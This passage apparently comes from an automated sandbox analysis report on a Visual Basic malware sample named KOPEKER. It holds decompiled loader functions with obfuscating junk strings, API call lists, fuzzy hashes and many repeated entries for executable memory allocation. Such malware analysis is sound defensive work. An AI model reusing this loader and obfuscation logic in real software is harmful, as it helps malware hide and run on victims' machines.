          					_push(L"Indpiskedes");
          					_push( &_v56);
          					L00401918();
          					_t68 = 0x10;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v32);
          					L0040191E();
          					L00401912();
          				}
          				_push(0x79b3bd);
          				E00411914();
          				_v268 = _t68;
          				L004018D0();
          				if(_v268 == 0x750289) {
          					_v144 = 0x80020004;
          					_v152 = 0xa;
          					_v128 = 0x80020004;
          					_v136 = 0xa;
          					_v112 = 0x80020004;
          					_v120 = 0xa;
          					_v96 = 0x80020004;
          					_v104 = 0xa;
          					_v80 = 0x80020004;
          					_v88 = 0xa;
          					_v64 = 0x80020004;
          					_v72 = 0xa;
          					_v160 = L"NOSTER";
          					_v168 = 8;
          					L004018A0();
          					_push( &_v152);
          					_push( &_v136);
          					_push( &_v120);
          					_push( &_v104);
          					_push( &_v88);
          					_push( &_v72);
          					_push( &_v56);
          					L0040187C();
          					L00401882();
          					_push( &_v152);
          					_push( &_v136);
          					_push( &_v120);
          					_push( &_v104);
          					_push( &_v88);
          					_push( &_v72);
          					_t68 =  &_v56;
          					_push(_t68);
          					_push(7);
          					L00401942();
          				}
          				_push(0x4154ac);
          				L00401924();
          				L004018AC();
          				return _t68;
          			}


          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415286
          • __vbaStrToAnsi.MSVBVM60(0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004152B8
          • __vbaStrToAnsi.MSVBVM60(?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004152C7
          • __vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,004C69DF,00000000,?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004152E7
          • __vbaFreeStrList.MSVBVM60(00000002,?,0054C27C), ref: 0041530E
          • #716.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 0041532C
          • __vbaChkstk.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 00415334
          • __vbaLateIdSt.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 00415347
          • __vbaFreeVar.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 0041534F
          • __vbaSetSystemError.MSVBVM60(0079B3BD,?,?,004016F6), ref: 00415364
          • __vbaVarDup.MSVBVM60 ref: 004153F3
          • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041541A
          • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00415424
          • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041544D
          • __vbaFreeStr.MSVBVM60(004154AC), ref: 0041549E
          • __vbaFreeObj.MSVBVM60(004154AC), ref: 004154A6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$AnsiChkstkErrorListSystem$#596#716LateMove
          • String ID: Indpiskedes$NOSTER$bangsternears$hjlrd
          • API String ID: 2424355990-1043710842
          • Opcode ID: 81f8d63ecd90b5757c22fb64523531df8668fff5e84910bdd845b366f698622c
          • Instruction ID: ce894af612394e7026e56e7eb93882ba838e82bcec8e4c1f7873085a40d20675
          • Opcode Fuzzy Hash: 81f8d63ecd90b5757c22fb64523531df8668fff5e84910bdd845b366f698622c
          • Instruction Fuzzy Hash: 1751FAB2D4020CAADB11EFA1C945BDEB7B8EF04304F20806AF205B7191DBB95B89CF54
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 489 415068-4150fb __vbaChkstk __vbaVarDup #663 __vbaVarTstNe __vbaFreeVarList 490 415107-41512f 489->490 491 4150fd-415102 #532 489->491 491->490
          C-Code - Quality: 42%
          			E00415068(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				long long _v28;
          				char _v44;
          				char _v60;
          				char* _v84;
          				intOrPtr _v92;
          				intOrPtr _v100;
          				char _v108;
          				short _v112;
          				short _t23;
          				short _t26;
          				intOrPtr _t35;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t35;
          				_push(0x60);
          				L004016F0();
          				_v12 = _t35;
          				_v8 = 0x4014f8;
          				_v84 = L"12-12-12";
          				_v92 = 8;
          				L004018A0();
          				_push(1);
          				_push(1);
          				_push( &_v44);
          				_push(0x411c90);
          				_push( &_v60); // executed
          				L00401822(); // executed
          				_v100 = 0xc;
          				_v108 = 0x8002;
          				_push( &_v60);
          				_t23 =  &_v108;
          				_push(_t23);
          				L00401828();
          				_v112 = _t23;
          				_push( &_v60);
          				_push( &_v44);
          				_push(2);
          				L00401942();
          				_t26 = _v112;
          				if(_t26 != 0) {
          					_push(L"ankergangs");
          					L00401894();
          				}
          				_v28 =  *0x4014f0;
          				asm("wait");
          				_push(0x415130);
          				return _t26;
          			}


          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415083
          • __vbaVarDup.MSVBVM60 ref: 004150A9
          • #663.MSVBVM60(?,00411C90,?,00000001,00000001), ref: 004150BF
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,00411C90,?,00000001,00000001), ref: 004150DA
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,00411C90,?,00000001,00000001), ref: 004150ED
          • #532.MSVBVM60(ankergangs), ref: 00415102
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$#532#663ChkstkFreeList
          • String ID: 12-12-12$ankergangs
          • API String ID: 2176192853-2523394133
          • Opcode ID: 34089ffcb03df8dc18ef8706fa4cd4cd8b7f12f149141d495d4d41a869cb5dfa
          • Instruction ID: c34c4213d746cc0dc69b867a437d4921af468d752f493f1137ff5ccf605005f6
          • Opcode Fuzzy Hash: 34089ffcb03df8dc18ef8706fa4cd4cd8b7f12f149141d495d4d41a869cb5dfa
          • Instruction Fuzzy Hash: 6E11FBB1D4064CAADB01EBD1D846FEEBBBCEB44B44F50442AF100BA191E7B95584CBA9
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 493 41593d-41598d __vbaChkstk call 411884 __vbaSetSystemError 496 415a05-415a1b 493->496 497 41598f-415996 493->497 498 4159b0 497->498 499 415998-4159ae __vbaNew2 497->499 501 4159b7-4159e0 __vbaObjSetAddref 498->501 499->501 503 4159e2-4159f7 __vbaHresultCheckObj 501->503 504 4159f9 501->504 505 4159fd-415a00 __vbaFreeObj 503->505 504->505 505->496
          C-Code - Quality: 57%
          			E0041593D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				short _v24;
          				char _v28;
          				signed int _v32;
          				intOrPtr* _v36;
          				signed int _v40;
          				intOrPtr* _v48;
          				signed int _v52;
          				signed int _t24;
          				char* _t27;
          				intOrPtr _t37;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t37;
          				_t24 = 0x20;
          				L004016F0();
          				_v12 = _t37;
          				_v8 = 0x401560;
          				_push(0x3090b5);
          				_push(0x8904d3f8);
          				_push(0x8904d3f8); // executed
          				E00411884(); // executed
          				_v32 = _t24;
          				L004018D0();
          				if(_v32 == 0x2ab3a6) {
          					if( *0x4183d8 != 0) {
          						_v48 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v48 = 0x4183d8;
          					}
          					_v36 =  *_v48;
          					_t27 =  &_v28;
          					L004018BE();
          					_t24 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t27, _t27, _a4);
          					asm("fclex");
          					_v40 = _t24;
          					if(_v40 >= 0) {
          						_v52 = _v52 & 0x00000000;
          					} else {
          						_push(0x10);
          						_push(0x411ad0);
          						_push(_v36);
          						_push(_v40);
          						L00401906();
          						_v52 = _t24;
          					}
          					L004018AC();
          				}
          				_v24 = 0x3e59;
          				_push(0x415a1c);
          				return _t24;
          			}


          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415958
          • __vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415981
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 004159A2
          • __vbaObjSetAddref.MSVBVM60(?,?,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 004159C6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000010,?,?,?,?,?,?,004016F6), ref: 004159EF
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004016F6), ref: 00415A00
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$AddrefCheckChkstkErrorFreeHresultNew2System
          • String ID: Y>
          • API String ID: 3092135765-3955353929
          • Opcode ID: daf84958c5e3a6200ed88768f6025a689affe214ff534318e7b3d931a58596e6
          • Instruction ID: 05ffcd4c2287ab0b5148b41b0bb9954bea56509de74fcc4f12fad6ba98ae8c0f
          • Opcode Fuzzy Hash: daf84958c5e3a6200ed88768f6025a689affe214ff534318e7b3d931a58596e6
          • Instruction Fuzzy Hash: 2D2148B0D50708EBCF00AB95C845BDEBBB4EB08744F10456AF500B61A1D7B929809B69
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 506 401968-401978 #100 507 40197a-4019ac 506->507 508 401a13-401a1d 507->508 509 4019ae-4019ba 507->509 511 401a91-401a94 508->511 512 401a1f-401a34 508->512 510 4019bc-4019cb 509->510 510->507 513 4019cd 510->513 516 401a95-401a9a 511->516 517 401a4e-401a8f 511->517 514 401a36-401a4d 512->514 515 401a9c 512->515 513->510 518 4019cf-4019d7 513->518 514->517 521 401acc-401e04 515->521 522 401a9f-401abd 515->522 516->515 517->511 518->508 523 401e06-401e71 521->523 522->521 523->523 524 401e73-401e95 523->524
          C-Code - Quality: 90%
          			_entry_(signed int __eax, void* __ebx, void* __edx) {
          				intOrPtr* _t5;
          
          				_push("VB5!6&*"); // executed
          				L00401960(); // executed
          				 *__eax =  *__eax + __eax;
          				 *__eax =  *__eax + __eax;
          				 *__eax =  *__eax + __eax;
          				 *__eax =  *__eax ^ __eax;
          				 *__eax =  *__eax + __eax;
          				_t5 = __eax + 1;
          				 *_t5 =  *_t5 + _t5;
          				 *_t5 =  *_t5 + _t5;
          				 *_t5 =  *_t5 + _t5;
          				 *((intOrPtr*)(__ebx - 0x604c4d3d)) =  *((intOrPtr*)(__ebx - 0x604c4d3d)) + __edx;
          				return __ebx;
          			}


          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: #100
          • String ID: VB5!6&*
          • API String ID: 1341478452-3593831657
          • Opcode ID: 3e4ab4c0f6b93dab2893aa36d90813d0b26029a8ea59cdd29ad1e1e64e70e738
          • Instruction ID: 22f0427cd30c477063d476950ab16c50c77b4c44e7291ad08b44288221de2275
          • Opcode Fuzzy Hash: 3e4ab4c0f6b93dab2893aa36d90813d0b26029a8ea59cdd29ad1e1e64e70e738
          • Instruction Fuzzy Hash: 2F42643558F3C28FCB434B708D611917FB1AE1726475E00EBC8809E4B3E2AD5C8ADB62
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a870327af49fc829c68e3a212f49dcd0fe5e2b03a84ecfdfbb8ae05edc6c9268
          • Instruction ID: 2ac516b0689afb8bcb884ecfcafc2f3768ee7b20b4bf0ae203909c5422a6f353
          • Opcode Fuzzy Hash: a870327af49fc829c68e3a212f49dcd0fe5e2b03a84ecfdfbb8ae05edc6c9268
          • Instruction Fuzzy Hash: 6DF1CB82A2A70689FFB22160C5D071D6980DF16385F718F3BDD61F58E2A71F86CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 735b598f10bf07c8912f81eb5c9c77704902051a3e1b2441906b48e2d2e5b669
          • Instruction ID: 807ccc12e0f7f2ffb699d33e77619acf9edf787ad458807e9a4eedef85388390
          • Opcode Fuzzy Hash: 735b598f10bf07c8912f81eb5c9c77704902051a3e1b2441906b48e2d2e5b669
          • Instruction Fuzzy Hash: 72F1CB81A2A70689FFB22160C5D071D6980DF16385F718F3BD961F58E2A71FC6CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 0d9118e3824e240baef12077212766c2091842aca75622a94b6788747a8f954c
          • Instruction ID: 45d20b20a92e5e9d1f48ce68232dd31ec7ef10426473f68ee6f0306a288c2a86
          • Opcode Fuzzy Hash: 0d9118e3824e240baef12077212766c2091842aca75622a94b6788747a8f954c
          • Instruction Fuzzy Hash: ECF1CD81A2A70689FFB22160C5D071D6980DF16385F718F3BD861F59E2A71FC6CE158B
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 7b409998e7a2624269b1e9867940b083bcf58449ff535d896c47fa011a46069d
          • Instruction ID: c54e73c3d323a95c587366cfb6aed5ff1e8008128157bde069087f22b7e88860
          • Opcode Fuzzy Hash: 7b409998e7a2624269b1e9867940b083bcf58449ff535d896c47fa011a46069d
          • Instruction Fuzzy Hash: 67F1CD81A2A70689FFB22160C5D071D6980DF16385F718F3BD861F59E2A71FC6CE168B
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: ddc6aa0afbd3414f20353239f5851d19e61738a4148a3888739cff35583429af
          • Instruction ID: 2a0da5b14954853fc2a2adbc61ecdf0f74b5ac0c1bf4298116e99700e24bad04
          • Opcode Fuzzy Hash: ddc6aa0afbd3414f20353239f5851d19e61738a4148a3888739cff35583429af
          • Instruction Fuzzy Hash: ABD1CC82A2A70689FFB22160C4D071D6980DF16385F318F37DC61F59E2A75F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: f1e4dc4efb29c05f5923d96c1962d0646732043ddc74a4afce532c1cfcd2e9a5
          • Instruction ID: f9cc1e3df359ec3ae265d6420f780488e67cb8c19be8630c56b3cafeec40b7ec
          • Opcode Fuzzy Hash: f1e4dc4efb29c05f5923d96c1962d0646732043ddc74a4afce532c1cfcd2e9a5
          • Instruction Fuzzy Hash: 0FE1EE86A2A70689EFB22160C4D071D6980DF16385F318F3BDC61F55E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: @$E
          • API String ID: 0-2021982315
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: [E
          • API String ID: 0-398173237
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
